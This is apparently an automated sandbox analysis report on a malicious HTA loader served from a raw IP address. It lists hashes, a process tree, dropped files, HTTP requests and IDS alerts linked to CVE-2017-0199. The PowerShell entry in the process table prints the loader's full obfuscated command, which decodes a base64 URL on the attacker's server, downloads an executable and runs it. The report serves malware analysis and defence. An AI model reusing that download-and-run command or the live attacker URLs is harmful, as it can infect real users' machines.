analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://80.82.66.58/whbg/newonedonetoday.hta

Full analysis: https://app.any.run/tasks/fae49308-c968-4345-a124-670e5cb668a2
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: April 25, 2019, 04:03:34
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
loader
Indicators:
MD5:

2DEC48230F6C587C0A6C5A9B22A64CAE

SHA1:

96DEF2BB0EFFC4DDE663E09D959CE9B669CF7A9C

SHA256:

62D87E5D5D49A922EC4709E433395375D48F31D688F36454DC58265A5AEE46CA

SSDEEP:

3:N1KgYKyLASVQBVE:CgYKyrSBVE

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • mshta.exe (PID: 1184)
    • Application was dropped or rewritten from another process

      • lth.exe (PID: 3536)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3516)
    • Downloads executable files from IP

      • powershell.exe (PID: 3516)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3516)
    • Creates files in the user directory

      • powershell.exe (PID: 3516)
  • INFO

    • Creates files in the user directory

      • iexplore.exe (PID: 2760)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 2760)
      • iexplore.exe (PID: 3852)
    • Reads settings of System Certificates

      • iexplore.exe (PID: 3852)
    • Changes internet zones settings

      • iexplore.exe (PID: 3852)
    • Adds / modifies Windows certificates

      • iexplore.exe (PID: 3852)
    • Changes settings of System certificates

      • iexplore.exe (PID: 3852)
    • Reads internet explorer settings

      • iexplore.exe (PID: 2760)
      • mshta.exe (PID: 1184)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
5
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start iexplore.exe iexplore.exe mshta.exe powershell.exe lth.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3852"C:\Program Files\Internet Explorer\iexplore.exe" -nohomeC:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2760"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3852 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
1184C:\Windows\System32\mshta.exe -EmbeddingC:\Windows\System32\mshta.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3516"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$BOsMaCeud = Get-Random -Min 3 -Max 4;$zgohmskxd = ([char[]]([char]97..[char]122));$mgRiAMVl = -join ($zgohmskxd | Get-Random -Count $BOsMaCeud | % {[Char]$_});$hRMAQDyI = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$ddbzCDE = $mgRiAMVl + $hRMAQDyI;$XmGCEX=[char]0x53+[char]0x61+[char]0x4c;$AGGkasvtR=[char]0x49+[char]0x45+[char]0x58;$qGBBCmLZAdqXLfG=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL jtvzpuq $XmGCEX;$IXXygq=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;jtvzpuq dstegvnwjl $AGGkasvtR;$PHSxteLwqS=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|dstegvnwjl;jtvzpuq ajsohvpurxen $qGBBCmLZAdqXLfG;$lAeskn = $PHSxteLwqS + [char]0x5c + $ddbzCDE;;;;$YedKCsjvfiUaH = 'aHR0cDovLzgwLjgyLjY2LjU4L3doYmcvY29weW9mZG9jNTAwOTk5ODk4OThBLmV4ZQ==';$YedKCsjvfiUaH=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($YedKCsjvfiUaH));$NqZSeCMnckiP = New-Object $IXXygq;$kTWWhJZOLXN = $NqZSeCMnckiP.DownloadData($YedKCsjvfiUaH);[IO.File]::WriteAllBytes($lAeskn, $kTWWhJZOLXN);ajsohvpurxen $lAeskn;;$twQPLjlwfd = @($nndEfRIYNYFnv, $ukPlgvdoJkqOg, $raMOGnierTOH, $ILsTJsEPv);foreach($pfdHrttK in $twQPLjlwfd){$null = $_}""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3536"C:\Users\Public\lth.exe" C:\Users\Public\lth.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Total events
715
Read events
560
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
2
Text files
12
Unknown types
5

Dropped files

PID
Process
Filename
Type
3852iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\favicon[1].ico
MD5:
SHA256:
3852iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
3852iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF5F2889E49142C729.TMP
MD5:
SHA256:
3852iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{2046634C-670F-11E9-A370-5254004A04AF}.dat
MD5:
SHA256:
3852iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF3AB3CC26C84746EB.TMP
MD5:
SHA256:
3852iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{2046634B-670F-11E9-A370-5254004A04AF}.dat
MD5:
SHA256:
3516powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EAU2G4ODY0T6FU5JS653.temp
MD5:
SHA256:
1184mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\newonedonetoday[1].htahtml
MD5:CCF23A23AEFEA21BFEEC431117F5A4D7
SHA256:8AD555C2EADD6D2B6538A5692632972F529AAB7F7C9BF811F467872B7C843E48
2760iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BR1R2RH4\newonedonetoday[1].htahtml
MD5:D4304E02006A37624F3416844A143C29
SHA256:1CB6D1C33DB16591D63565CA6F112B5B568B65628EBC6C02C62214C93C6B9AC0
3852iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012019042520190426\index.datdat
MD5:46BF78A0AB483023F81B9269A1C49ECF
SHA256:2E2FB0CCC40FAB83BD13BAD60B509BEDABE4E838E2BF2982185DB386AB84C989
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
4
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2760
iexplore.exe
GET
200
80.82.66.58:80
http://80.82.66.58/whbg/newonedonetoday.hta
SC
html
16.7 Kb
suspicious
3516
powershell.exe
GET
200
80.82.66.58:80
http://80.82.66.58/whbg/copyofdoc50099989898A.exe
SC
executable
1.11 Mb
suspicious
1184
mshta.exe
GET
200
80.82.66.58:80
http://80.82.66.58/whbg/newonedonetoday.hta
SC
html
16.7 Kb
suspicious
3852
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3852
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3516
powershell.exe
80.82.66.58:80
Quasi Networks LTD.
SC
suspicious
2760
iexplore.exe
80.82.66.58:80
Quasi Networks LTD.
SC
suspicious
1184
mshta.exe
80.82.66.58:80
Quasi Networks LTD.
SC
suspicious

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted

Threats

PID
Process
Class
Message
2760
iexplore.exe
Potentially Bad Traffic
ET POLICY Possible HTA Application Download
1184
mshta.exe
Potentially Bad Traffic
ET POLICY Possible HTA Application Download
1184
mshta.exe
Attempted User Privilege Gain
ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
1184
mshta.exe
A Network Trojan was detected
ET CURRENT_EVENTS SUSPICIOUS MSXMLHTTP DL of HTA (Observed in CVE-2017-0199)
1184
mshta.exe
Attempted User Privilege Gain
ET WEB_CLIENT HTA File containing Wscript.Shell Call - Potential CVE-2017-0199
3516
powershell.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
3516
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3516
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3516
powershell.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
No debug info